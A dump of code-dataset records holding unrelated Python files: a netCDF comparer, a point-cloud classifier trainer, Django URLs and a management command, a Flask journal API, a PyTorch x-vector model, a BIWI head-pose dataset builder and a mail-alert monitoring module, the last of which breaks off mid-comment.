Ignoring.')\n continue\n var_trial = read_var(nc_trial, var_name)\n\n tol = tol_categorical if is_categorical else tol_continuous\n\n try:\n var_equal = compare_var(var_ref, var_trial, var_name, is_categorical, no_data, tol, mean)\n except Exception as e:\n logging.error(f'Error processing \"{var_name}\": {e}', exc_info=e)\n var_equal = False\n file_equal = file_equal and var_equal\n return file_equal\n","sub_path":"wats/nccmp.py","file_name":"nccmp.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"535851978","text":"import time\nimport copy\nimport numpy as np\nimport math\n\nfrom options import Options\nopt = Options().parse() # set CUDA_VISIBLE_DEVICES before import torch\n\nimport torch\nimport torchvision\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport random\nimport numpy as np\n\nfrom models.classifier import Model\nfrom data.modelnet_shrec_loader import ModelNet_Shrec_Loader\nfrom util.visualizer import Visualizer\n\n\nif __name__=='__main__':\n trainset = ModelNet_Shrec_Loader(opt.dataroot, 'train', opt)\n dataset_size = len(trainset)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=opt.batch_size, shuffle=True, num_workers=opt.nThreads)\n print('#training point clouds = %d' % len(trainset))\n\n testset = ModelNet_Shrec_Loader(opt.dataroot, 'val', opt)\n testloader = torch.utils.data.DataLoader(testset, batch_size=opt.batch_size, shuffle=False, num_workers=opt.nThreads)\n\n # create model, optionally load pre-trained model\n model = Model(opt)\n if opt.pretrain is not None:\n model.encoder.load_state_dict(torch.load(opt.pretrain))\n ############################# automation for ModelNet10 / 40 configuration ####################\n # if opt.classes == 10:\n # opt.lr = opt.lr * 0.1\n # opt.dropout = opt.dropout + 0.1\n ############################# automation for ModelNet10 / 40 configuration ####################\n\n visualizer = Visualizer(opt)\n\n best_accuracy = 0\n for epoch in range(201):\n\n epoch_iter = 0\n for i, data in enumerate(trainloader):\n iter_start_time = time.time()\n epoch_iter += opt.batch_size\n\n input_pc, input_sn, input_label, input_node, input_node_knn_I = data\n model.set_input(input_pc, input_sn, input_label, input_node, input_node_knn_I)\n\n model.optimize(epoch=epoch)\n\n if i % 600 == 0:\n # print/plot errors\n t = (time.time() - iter_start_time) / opt.batch_size\n\n errors = model.get_current_errors()\n\n visualizer.print_current_errors(epoch, epoch_iter, errors, t)\n visualizer.plot_current_errors(epoch, float(epoch_iter) / dataset_size, opt, errors)\n\n # print(model.autoencoder.encoder.feature)\n # visuals = model.get_current_visuals()\n # visualizer.display_current_results(visuals, epoch, i)\n\n # test network\n if epoch >= 0 and epoch%1==0:\n batch_amount = 0\n model.test_loss.data.zero_()\n model.test_accuracy.data.zero_()\n for i, data in enumerate(testloader):\n input_pc, input_sn, input_label, input_node, input_node_knn_I = data\n model.set_input(input_pc, input_sn, input_label, input_node, input_node_knn_I)\n model.test_model()\n\n batch_amount += input_label.size()[0]\n\n # # accumulate loss\n model.test_loss += model.loss.detach() * input_label.size()[0]\n\n # # accumulate accuracy\n _, predicted_idx = torch.max(model.score.data, dim=1, keepdim=False)\n correct_mask = torch.eq(predicted_idx, model.input_label).float()\n test_accuracy = 
torch.mean(correct_mask).cpu()\n model.test_accuracy += test_accuracy * input_label.size()[0]\n\n model.test_loss /= batch_amount\n model.test_accuracy /= batch_amount\n if model.test_accuracy.item() > best_accuracy:\n best_accuracy = model.test_accuracy.item()\n print('Tested network. So far best: %f' % (best_accuracy) )\n\n # save network\n saving_acc_threshold = 0.89\n if model.test_accuracy.item() > saving_acc_threshold:\n print(\"Saving network...\")\n model.save_network(model.encoder, 'encoder', '%d_%f' % (epoch, model.test_accuracy.item()), opt.gpu_id)\n model.save_network(model.classifier, 'classifier', '%d_%f' % (epoch, model.test_accuracy.item()), opt.gpu_id)\n\n # learning rate decay\n if opt.classes == 10:\n lr_decay_step = 40\n else:\n lr_decay_step = 20\n if epoch%lr_decay_step==0 and epoch>0:\n model.update_learning_rate(0.5)\n # batch normalization momentum decay:\n next_epoch = epoch + 1\n if (opt.bn_momentum_decay_step is not None) and (next_epoch >= 1) and (\n next_epoch % opt.bn_momentum_decay_step == 0):\n current_bn_momentum = opt.bn_momentum * (\n opt.bn_momentum_decay ** (next_epoch // opt.bn_momentum_decay_step))\n print('BN momentum updated to: %f' % current_bn_momentum)\n\n # save network\n # if epoch%20==0 and epoch>0:\n # print(\"Saving network...\")\n # model.save_network(model.classifier, 'cls', '%d' % epoch, opt.gpu_id)\n\n\n\n\n\n","sub_path":"shrec16/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"110002239","text":"from django.conf.urls import patterns, url, include\nfrom django.conf import settings\n\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'web.apps.gallery.views.home'),\n url(r'^gallery/', include('web.apps.gallery.urls')),\n\n # Register view\n url(r'^register', \"web.apps.gallery.views.register\"),\n\n # Search view\n url(r'^search$', \"web.apps.gallery.views.search\"),\n\n # Login view\n url(r'^login$', \"web.apps.gallery.views.auth\"),\n\n # Logout view\n url(r'^logout$', \"web.apps.gallery.views.sign_out\"),\n\n # Upload view\n url(r'^upload$', \"web.apps.gallery.views.upload\"),\n\n # Examples:\n # url(r'^$', 'web.views.home', name='home'),\n # url(r'^web/', include('web.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n )\n\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n url(r'^data/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n url(r'^static/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT,\n }),\n )\n","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"144823765","text":"from django.core.management import BaseCommand\nfrom django.db.backends.utils import logger\n\n\nfrom industry.models import Industry\nfrom company.models import Company\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n logger.info('Correcting Industry data...')\n industry = Industry.objects.get(pk=24)\n companies = Company.objects.filter(industry=industry)\n\n for company in companies:\n 
company.industry = Industry.objects.get(pk=1)\n company.save()\n\n industry.delete()\n logger.info('Finished changes.')\n","sub_path":"industry/management/commands/fix_empty_industry.py","file_name":"fix_empty_industry.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"170005141","text":"from flask import Flask\nfrom flask_restful import Api, Resource, reqparse, abort, marshal_with, fields\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom datetime import date\nfrom transformers import pipeline, Conversation\n\nconversational_pipeline = pipeline(\"conversational\")\nconversation_1 = Conversation(\"Hello\")\n\napp = Flask(__name__)\napi = Api(app)\nCORS(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'\ndb = SQLAlchemy(app)\n\nfrom datetime import datetime\n\n\nclass JournelModel(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n body = db.Column(db.String)\n date = db.Column(db.String)\n time = db.Column(db.String)\n bot_output = db.Column(db.String)\n\n\ndb.create_all()\n\nmodel_put_args = reqparse.RequestParser()\nmodel_put_args.add_argument(\"name\", type=str, help=\"Name\")\nmodel_put_args.add_argument(\"body\", type=str, help=\"body\")\n\nbot_args = reqparse.RequestParser()\nbot_args.add_argument(\"input\", type=str, help=\"input\")\n\nresource_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'body': fields.String,\n 'date': fields.String,\n 'time': fields.String,\n 'bot_output': fields.String\n}\n\n\nclass Model(Resource):\n\n @marshal_with(resource_fields)\n def get(self, model_id):\n result = JournelModel.query.filter_by(id=model_id).first()\n if not result:\n abort(404, message=\"Could not find with that id\")\n return result\n\n @marshal_with(resource_fields)\n def delete(self, model_id):\n result = JournelModel.query.filter_by(id=model_id).first()\n if not result:\n abort(404, message=\"Could not find video with that id\")\n db.session.delete(result)\n db.session.commit()\n return 200\n\n\napi.add_resource(Model, \"/model/\")\n\n\nclass Model_all(Resource):\n\n @marshal_with(resource_fields)\n def get(self):\n result = JournelModel.query.all()\n return result\n\n @marshal_with(resource_fields)\n def post(self):\n args = model_put_args.parse_args()\n conversation_1.add_user_input(args['body'])\n output = str(conversational_pipeline([conversation_1])).splitlines()[-1].replace('bot >>', '')\n\n model = JournelModel(name=args['name'], body=args['body'], date=date.today(),\n time=datetime.now().strftime(\"%H:%M:%S\"), bot_output=output )\n\n db.session.add(model)\n db.session.commit()\n return 201\n\napi.add_resource(Model_all, \"/model\")\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"241609046","text":"# -*- coding:utf-8 -*-\n\n# Copyright xmuspeech (Author: Snowdar 2020-02-05)\nimport time\nimport math\nimport torch\nimport torch.nn.functional as F\nimport libs.support.utils as utils\n\nfrom libs.nnet import *\n\nclass Xvector(TopVirtualNnet):\n \"\"\" A composite x-vector framework \"\"\"\n \n ## Base parameters - components - loss - training strategy.\n def init(self, inputs_dim, num_targets, extend=False, skip_connection=False, \n mixup=False, mixup_alpha=1.0,\n specaugment=False, 
specaugment_params={},\n aug_dropout=0., context_dropout=0., hidden_dropout=0., dropout_params={},\n SE=False, se_ratio=4,\n tdnn_layer_params={},\n tdnn6=True, tdnn7_params={},\n pooling=\"statistics\", pooling_params={},\n margin_loss=False, margin_loss_params={},\n use_step=False, step_params={},\n transfer_from=\"softmax_loss\",\n training=True, extracted_embedding=\"far\"):\n\n ## Params.\n default_dropout_params = {\n \"type\":\"default\", # default | random\n \"start_p\":0.,\n \"dim\":2,\n \"method\":\"uniform\", # uniform | normals\n \"continuous\":False,\n \"inplace\":True\n }\n\n default_tdnn_layer_params = {\n \"nonlinearity\":'relu', \"nonlinearity_params\":{\"inplace\":True},\n \"bn-relu\":False, \"bn\":True, \"bn_params\":{\"momentum\":0.5, \"affine\":False, \"track_running_stats\":True}\n }\n\n default_pooling_params = {\n \"num_nodes\":1500,\n \"num_head\":1,\n \"share\":True,\n \"affine_layers\":1,\n \"hidden_size\":64,\n \"context\":[0],\n \"stddev\":True,\n \"temperature\":False, \n \"fixed\":True,\n \"stddev\":True\n }\n\n default_margin_loss_params = {\n \"method\":\"am\", \"m\":0.2, \n \"feature_normalize\":True, \"s\":30, \n \"double\":False,\n \"mhe_loss\":False, \"mhe_w\":0.01,\n \"inter_loss\":0.,\n \"ring_loss\":0.,\n \"curricular\":False\n }\n\n default_step_params = {\n \"T\":None,\n \"m\":False, \"lambda_0\":0, \"lambda_b\":1000, \"alpha\":5, \"gamma\":1e-4,\n \"s\":False, \"s_tuple\":(30, 12), \"s_list\":None,\n \"t\":False, \"t_tuple\":(0.5, 1.2), \n \"p\":False, \"p_tuple\":(0.5, 0.1)\n }\n\n dropout_params = utils.assign_params_dict(default_dropout_params, dropout_params)\n tdnn_layer_params = utils.assign_params_dict(default_tdnn_layer_params, tdnn_layer_params)\n # If param is not be specified, default it w.r.t tdnn_layer_params.\n tdnn7_params = utils.assign_params_dict(tdnn_layer_params, tdnn7_params)\n pooling_params = utils.assign_params_dict(default_pooling_params, pooling_params)\n margin_loss_params = utils.assign_params_dict(default_margin_loss_params, margin_loss_params)\n step_params = utils.assign_params_dict(default_step_params, step_params)\n\n ## Var.\n self.skip_connection = skip_connection\n self.use_step = use_step\n self.step_params = step_params\n\n self.extracted_embedding = extracted_embedding # For extract.\n \n ## Nnet.\n # Head\n self.mixup = Mixup(alpha=mixup_alpha) if mixup else None\n self.specaugment = SpecAugment(**specaugment_params) if specaugment else None\n self.aug_dropout = get_dropout_from_wrapper(aug_dropout, dropout_params)\n self.context_dropout = ContextDropout(p=context_dropout) if context_dropout > 0 else None\n self.hidden_dropout = get_dropout_from_wrapper(hidden_dropout, dropout_params)\n\n # Frame level\n self.tdnn1 = ReluBatchNormTdnnLayer(inputs_dim,512,[-2,-1,0,1,2], **tdnn_layer_params)\n self.tdnn2 = ReluBatchNormTdnnLayer(512,512,[-2,0,2], **tdnn_layer_params)\n self.se2 = SEBlock(512, ratio=se_ratio) if SE else None\n self.tdnn3 = ReluBatchNormTdnnLayer(512,512,[-3,0,3], **tdnn_layer_params)\n self.tdnn4 = torch.nn.Conv1d(512, 256, kernel_size=1, bias=False)\n num_nodes = pooling_params.pop(\"num_nodes\")\n # Pooling\n stddev = pooling_params.pop(\"stddev\")\n \n assert pooling == \"serialized-attention\"\n self.stats = SerializedMultiHeadMultiLayerAttention(num_nodes, affine_layers=pooling_params[\"affine_layers\"], hidden_size=pooling_params[\"hidden_size\"], context=pooling_params[\"context\"])\n stats_dim = self.stats.get_output_dim()\n\t # Segment level\n tdnn7_dim = stats_dim\n\n if 
tdnn7_params[\"nonlinearity\"] == \"default\":\n tdnn7_params[\"nonlinearity\"] = tdnn_layer_params[\"nonlinearity\"]\n\n self.tdnn7 = ReluBatchNormTdnnLayer(tdnn7_dim, 512, **tdnn7_params)\n\n # Loss\n # Do not need when extracting embedding.\n if training :\n if margin_loss:\n self.loss = MarginSoftmaxLoss(512, num_targets, **margin_loss_params)\n else:\n self.loss = SoftmaxLoss(512, num_targets)\n\n self.wrapper_loss = MixupLoss(self.loss, self.mixup) if mixup else None\n\n # An example to using transform-learning without initializing loss.affine parameters\n self.transform_keys = [\"tdnn1\",\"tdnn2\",\"tdnn3\",\"stats\",\"tdnn6\",\"tdnn7\",\n \"ex_tdnn1\",\"ex_tdnn2\",\"ex_tdnn3\",\"ex_tdnn4\",\"ex_tdnn5\",\n \"se1\",\"se2\",\"se3\",\"se4\",\"loss\"]\n\n if margin_loss and transfer_from == \"softmax_loss\":\n # For softmax_loss to am_softmax_loss\n self.rename_transform_keys = {\"loss.affine.weight\":\"loss.weight\"} \n\n @utils.for_device_free\n def forward(self, inputs):\n \"\"\"\n @inputs: a 3-dimensional tensor (a batch), including [samples-index, frames-dim-index, frames-index]\n \"\"\"\n x = inputs\n x = self.tdnn1(x)\n x = self.tdnn2(x)\n x = self.tdnn3(x)\n x = self.tdnn4(x)\n x = self.stats(x)\n x = self.tdnn7(x)\n x = self.auto(self.hidden_dropout, x)\n return x\n\n @utils.for_device_free\n def get_loss(self, inputs, targets):\n \"\"\"Should call get_loss() after forward() with using Xvector model function.\n e.g.:\n m=Xvector(20,10)\n loss=m.get_loss(m(inputs),targets)\n\n model.get_loss [custom] -> loss.forward [custom]\n |\n v\n model.get_accuracy [custom] -> loss.get_accuracy [custom] -> loss.compute_accuracy [static] -> loss.predict [static]\n \"\"\"\n if self.wrapper_loss is not None:\n return self.wrapper_loss(inputs, targets)\n else:\n return self.loss(inputs, targets)\n\n @utils.for_device_free\n def get_accuracy(self, targets):\n \"\"\"Should call get_accuracy() after get_loss().\n @return: return accuracy\n \"\"\"\n if self.wrapper_loss is not None:\n return self.wrapper_loss.get_accuracy(targets)\n else:\n return self.loss.get_accuracy(targets)\n\n @for_extract_embedding(maxChunk=10000, isMatrix=True)\n def extract_embedding(self, inputs):\n \"\"\"\n inputs: a 3-dimensional tensor with batch-dim = 1 or normal features matrix\n return: an 1-dimensional vector after processed by decorator\n \"\"\"\n\n x = inputs\n\n x = self.tdnn1(x)\n x = self.tdnn2(x)\n x = self.tdnn3(x)\n x = self.tdnn4(x)\n x = self.stats.transform(x)\n\n assert self.extracted_embedding == \"far\"\n xvector = x\n\n return xvector\n\n def get_warmR_T(T_0, T_mult, epoch):\n n = int(math.log(max(0.05, (epoch / T_0 * (T_mult - 1) + 1)), T_mult))\n T_cur = epoch - T_0 * (T_mult ** n - 1) / (T_mult - 1)\n T_i = T_0 * T_mult ** (n)\n return T_cur, T_i\n\n def compute_decay_value(self, start, end, T_cur, T_i):\n # Linear decay in every cycle time.\n return start - (start - end)/(T_i-1) * (T_cur%T_i)\n\n def step(self, epoch, this_iter, epoch_batchs):\n # Heated up for t and s.\n # Decay for margin and dropout p.\n if self.use_step:\n if self.step_params[\"m\"]:\n current_postion = epoch*epoch_batchs + this_iter\n lambda_factor = max(self.step_params[\"lambda_0\"], \n self.step_params[\"lambda_b\"]*(1+self.step_params[\"gamma\"]*current_postion)**(-self.step_params[\"alpha\"]))\n self.loss.step(lambda_factor)\n\n if self.step_params[\"T\"] is not None and (self.step_params[\"t\"] or self.step_params[\"p\"]):\n T_cur, T_i = get_warmR_T(*self.step_params[\"T\"], epoch)\n T_cur = T_cur*epoch_batchs + 
this_iter\n T_i = T_i * epoch_batchs\n\n if self.step_params[\"t\"]:\n self.loss.t = self.compute_decay_value(*self.step_params[\"t_tuple\"], T_cur, T_i)\n\n if self.step_params[\"p\"]:\n self.aug_dropout.p = self.compute_decay_value(*self.step_params[\"p_tuple\"], T_cur, T_i)\n\n if self.step_params[\"s\"]:\n self.loss.s = self.step_params[\"s_tuple\"][self.step_params[\"s_list\"][epoch]]\n\n\n\n","sub_path":"subtools/pytorch/model/serialized-tdnn-xvector.py","file_name":"serialized-tdnn-xvector.py","file_ext":"py","file_size_in_byte":9207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"339284061","text":"import scipy.io as sio\nimport pandas as pd\nfrom os import listdir\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nimport sys\nimport cv2\nfrom moviepy.editor import *\nimport numpy as np\nimport argparse\nfrom mtcnn.mtcnn import MTCNN\n\n\ndef get_args():\n\tparser = argparse.ArgumentParser(description=\"This script cleans-up noisy labels \"\n\t \"and creates database for training.\",\n\t formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument(\"--db\", type=str, default='./BIWI',\n\t help=\"path to database\")\n\tparser.add_argument(\"--output\", type=str, default='./BIWI',\n\t help=\"path to output database mat file\")\n\tparser.add_argument(\"--img_size\", type=int, default=64,\n\t help=\"output image size\")\n\tparser.add_argument(\"--ad\", type=float, default=0.4,\n\t help=\"enlarge margin\")\n\t\n\n\targs = parser.parse_args()\n\treturn args\n\n\ndef main():\n\targs = get_args()\n\tmypath = args.db\n\toutput_path = args.output\n\timg_size = args.img_size\n\tad = args.ad\n\n\tisPlot = True\n\tdetector = MTCNN()\n\n\trandFlag = np.zeros(24)\n\trandFlag[0:16] = 1\n\trandFlag = np.random.permutation(randFlag)\n\n\tprint(randFlag)\n\toutput_train_path = output_path+'_train.npz'\n\toutput_test_path = output_path+'_test.npz'\n\n\tonlyfiles_png = []\n\tonlyfiles_txt = []\n\tfor num in range(0,24):\n\t\tif num<9:\n\t\t\tmypath_obj = mypath+'/0'+str(num+1)\n\t\telse:\n\t\t\tmypath_obj = mypath+'/'+str(num+1)\n\t\tprint(mypath_obj)\n\t\tonlyfiles_txt_temp = [f for f in listdir(mypath_obj) if isfile(join(mypath_obj, f)) and join(mypath_obj, f).endswith('.txt')]\n\t\tonlyfiles_png_temp = [f for f in listdir(mypath_obj) if isfile(join(mypath_obj, f)) and join(mypath_obj, f).endswith('.png')]\n\t\n\t\tonlyfiles_txt_temp.sort()\n\t\tonlyfiles_png_temp.sort()\n\n\t\tonlyfiles_txt.append(onlyfiles_txt_temp)\n\t\tonlyfiles_png.append(onlyfiles_png_temp)\n\tprint(len(onlyfiles_txt))\n\tprint(len(onlyfiles_png))\n\t\n\tout_imgs_train = []\n\tout_poses_train = []\n\n\tout_imgs_test = []\n\tout_poses_test = []\n\t\n\tfor i in range(len(onlyfiles_png)):\n\t\tprint('object %d' %i)\n\t\t\n\t\tmypath_obj = ''\n\t\tif i<9:\n\t\t\tmypath_obj = mypath+'/0'+str(i+1)\n\t\telse:\n\t\t\tmypath_obj = mypath+'/'+str(i+1)\n\n\t\tfor j in tqdm(range(len(onlyfiles_png[i]))):\n\t\t\t\n\t\t\timg_name = onlyfiles_png[i][j]\n\t\t\ttxt_name = onlyfiles_txt[i][j]\n\t\t\t\n\t\t\timg_name_split = img_name.split('_')\n\t\t\ttxt_name_split = txt_name.split('_')\n\n\t\t\tif img_name_split[1] != txt_name_split[1]:\n\t\t\t\tprint('Mismatched!')\n\t\t\t\tsys.exit()\n\n\n\t\t\tpose_path = mypath_obj+'/'+txt_name\n\t\t\t# Load pose in degrees\n\t\t\tpose_annot = open(pose_path, 'r')\n\t\t\tR = []\n\t\t\tfor line in pose_annot:\n\t\t\t\tline = line.strip('\\n').split(' ')\n\t\t\t\tL = []\n\t\t\t\tif line[0] != '':\n\t\t\t\t\tfor nb in 
line:\n\t\t\t\t\t\tif nb == '':\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tL.append(float(nb))\n\t\t\t\t\tR.append(L)\n\n\t\t\tR = np.array(R)\n\t\t\tT = R[3,:]\n\t\t\tR = R[:3,:]\n\t\t\tpose_annot.close()\n\n\t\t\tR = np.transpose(R)\n\n\t\t\troll = -np.arctan2(R[1][0], R[0][0]) * 180 / np.pi\n\t\t\tyaw = -np.arctan2(-R[2][0], np.sqrt(R[2][1] ** 2 + R[2][2] ** 2)) * 180 / np.pi\n\t\t\tpitch = np.arctan2(R[2][1], R[2][2]) * 180 / np.pi\n\n\n\n\t\t\timg = cv2.imread(mypath_obj+'/'+img_name)\n\t\t\timg_h = img.shape[0]\n\t\t\timg_w = img.shape[1]\n\t\t\tif j==0:\n\t\t\t\t[xw1_pre,xw2_pre,yw1_pre,yw2_pre] = [0,0,0,0]\n\t\t\tdetected = detector.detect_faces(img)\n\n\t\t\tif len(detected) > 0:\n\t\t\t\tdis_list = []\n\t\t\t\tXY = []\n\t\t\t\tfor i_d, d in enumerate(detected):\n\t\t\t\t\t\n\t\t\t\t\txv = []\n\t\t\t\t\tyv = []\n\t\t\t\t\tfor key, value in d['keypoints'].items():\n\t\t\t\t\t\txv.append(value[0]) \n\t\t\t\t\t\tyv.append(value[1])\n\t\t\t\t\t\n\t\t\t\t\tif d['confidence'] > 0.95:\n\t\t\t\t\t\tx1,y1,w,h = d['box']\n\t\t\t\t\t\tx2 = x1 + w\n\t\t\t\t\t\ty2 = y1 + h\n\t\t\t\t\t\txw1 = max(int(x1 - ad * w), 0)\n\t\t\t\t\t\tyw1 = max(int(y1 - ad * h), 0)\n\t\t\t\t\t\txw2 = min(int(x2 + ad * w), img_w - 1)\n\t\t\t\t\t\tyw2 = min(int(y2 + ad * h), img_h - 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Crop the face loosely\n\t\t\t\t\t\t# x_min = int(min(xv))\n\t\t\t\t\t\t# x_max = int(max(xv))\n\t\t\t\t\t\t# y_min = int(min(yv))\n\t\t\t\t\t\t# y_max = int(max(yv))\n\t\t\t\t\t\t\n\t\t\t\t\t\t# h = y_max-y_min\n\t\t\t\t\t\t# w = x_max-x_min\n\n\t\t\t\t\t\t# xw1 = max(int(x_min - ad * w), 0)\n\t\t\t\t\t\t# xw2 = min(int(x_max + ad * w), img_w - 1)\n\t\t\t\t\t\t# yw1 = max(int(y_min - ad * h), 0)\n\t\t\t\t\t\t# yw2 = min(int(y_max + ad * h), img_h - 1)\n\n\t\t\t\t\t\tXY.append([xw1,xw2,yw1,yw2])\n\t\t\t\t\t\tdis_betw_cen = np.abs(xw1-img_w*2/3)+np.abs(yw1-img_h*2/3)\n\t\t\t\t\t\tdis_list.append(dis_betw_cen)\n\t\t\t\t\n\t\t\t\tif len(dis_list)>0:\n\t\t\t\t\tmin_id = np.argmin(dis_list)\n\t\t\t\t\t[xw1,xw2,yw1,yw2] = XY[min_id]\n\n\n\t\t\t\tdis_betw_frames = np.abs(xw1-xw1_pre)\n\t\t\t\tif dis_betw_frames < 80 or j==0:\n\t\t\t\t\timg = cv2.resize(img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))\n\t\t\t\t\t[xw1_pre,xw2_pre,yw1_pre,yw2_pre] = [xw1,xw2,yw1,yw2]\n\t\t\t\t\tif isPlot:\n\t\t\t\t\t\tprint([xw1_pre,xw2_pre,yw1_pre,yw2_pre])\n\t\t\t\t\t\tcv2.imshow('check',img)\n\t\t\t\t\t\tk=cv2.waitKey(10)\n\t\t\t\t\timg = cv2.resize(img, (img_size, img_size))\n\t\t\t\t\tcont_labels = np.array([yaw, pitch, roll])\n\t\t\t\t\t\n\t\t\t\t\tif randFlag[i] == 1:\n\t\t\t\t\t\tout_imgs_train.append(img)\n\t\t\t\t\t\tout_poses_train.append(cont_labels)\n\t\t\t\t\telif randFlag[i] == 0:\n\t\t\t\t\t\tout_imgs_test.append(img)\n\t\t\t\t\t\tout_poses_test.append(cont_labels)\n\t\t\t\telse:\n\t\t\t\t\timg = cv2.resize(img[yw1_pre:yw2_pre + 1, xw1_pre:xw2_pre + 1, :], (img_size, img_size))\n\t\t\t\t\t# Checking the cropped image\n\t\t\t\t\tif isPlot:\n\t\t\t\t\t\tprint([xw1_pre,xw2_pre,yw1_pre,yw2_pre])\n\t\t\t\t\t\tprint('Distance between two frames too large! 
Use previous frame detected location.')\n\t\t\t\t\t\n\t\t\t\t\t\tcv2.imshow('check',img)\n\t\t\t\t\t\tk=cv2.waitKey(10)\n\t\t\t\t\timg = cv2.resize(img, (img_size, img_size))\n\t\t\t\t\tcont_labels = np.array([yaw, pitch, roll])\n\t\t\t\t\tif randFlag[i] == 1:\n\t\t\t\t\t\tout_imgs_train.append(img)\n\t\t\t\t\t\tout_poses_train.append(cont_labels)\n\t\t\t\t\telif randFlag[i] == 0:\n\t\t\t\t\t\tout_imgs_test.append(img)\n\t\t\t\t\t\tout_poses_test.append(cont_labels)\n\t\t\telse:\n\t\t\t\timg = cv2.resize(img[yw1_pre:yw2_pre + 1, xw1_pre:xw2_pre + 1, :], (img_size, img_size))\n\t\t\t\tif isPlot:\n\t\t\t\t\tprint('No face detected! Use previous frame detected location.')\n\t\t\t\t\n\t\t\t\t# Checking the cropped image\n\t\t\t\tif isPlot:\n\t\t\t\t\tcv2.imshow('check',img)\n\t\t\t\t\tk=cv2.waitKey(10)\n\t\t\t\timg = cv2.resize(img, (img_size, img_size))\n\t\t\t\tcont_labels = np.array([yaw, pitch, roll])\n\t\t\t\tif randFlag[i] == 1:\n\t\t\t\t\tout_imgs_train.append(img)\n\t\t\t\t\tout_poses_train.append(cont_labels)\n\t\t\t\telif randFlag[i] == 0:\n\t\t\t\t\tout_imgs_test.append(img)\n\t\t\t\t\tout_poses_test.append(cont_labels)\n\tnp.savez(output_train_path,image=np.array(out_imgs_train), pose=np.array(out_poses_train), img_size=img_size)\n\tnp.savez(output_test_path,image=np.array(out_imgs_test), pose=np.array(out_poses_test), img_size=img_size)\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"data/TYY_create_db_biwi_70_30.py","file_name":"TYY_create_db_biwi_70_30.py","file_ext":"py","file_size_in_byte":6577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"105096244","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# events.py\n# \n# Copyright 2012 Silvano Wegener \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \nimport os, sys, json, time, re\nsys.path.append('/opt/s87/bin/lib')\nsys.path.append('/opt/s87/config')\nimport log\nimport system\nimport basic\nimport mail\n\nclass NormalToHigh_Event(object):\n    def __init__(self, eventConfig, mailMethod):\n        self.sendMail = mailMethod\n        self.getValue = basic.valueGetter.get\n        self.valueName = eventConfig['value']\n        self.unit = eventConfig['unit']\n        self.highValue = eventConfig['highValue']\n        self.normalValue = eventConfig['normalValue']\n        self.notifyInterval = eventConfig['notifyInterval'] \n        self.eventInAction = False\n        self.eventInActionStartTime = False\n\n    def run(self):\n        values = self.getValue(self.valueName)\n        if not self.eventInAction:\n            for value in values:\n                if value >= self.highValue:\n                    subject = basic.HOSTNAME + ': ' + self.valueName + ' high!'\n                    message = self.valueName + ': ' + str(value) + self.unit\n                    self.sendMail(subject, message)\n                    self.eventInAction = True\n                    self.eventInActionStartTime = self.getTime()\n        else:\n            for value in values:\n                if value <= self.normalValue:\n                    subject = basic.HOSTNAME + ': ' + self.valueName + ' normal.'\n                    message = self.valueName + ': ' + str(value) + self.unit\n                    self.sendMail(subject, message) \n                    self.eventInAction = False\n            if self.getTime()-self.eventInActionStartTime >= self.notifyInterval:\n                self.eventInAction = False\n\n    def getTime(self):\n        return time.mktime(time.localtime())\n\nclass High_Event(object):\n    def __init__(self, eventConfig, mailMethod):\n        self.getValue = basic.valueGetter.get\n        self.sendMail = mailMethod\n        self.valueName = eventConfig['value']\n        self.unit = eventConfig['unit']\n        self.highValue = eventConfig['highValue']\n        self.notifyInterval = eventConfig['notifyInterval']\n        self.eventInAction = False\n        self.eventInActionStartTime = False\n\n    def run(self):\n        values = self.getValue(self.valueName)\n        if not self.eventInAction:\n            for value in values:\n                # Only alert once a value actually exceeds the 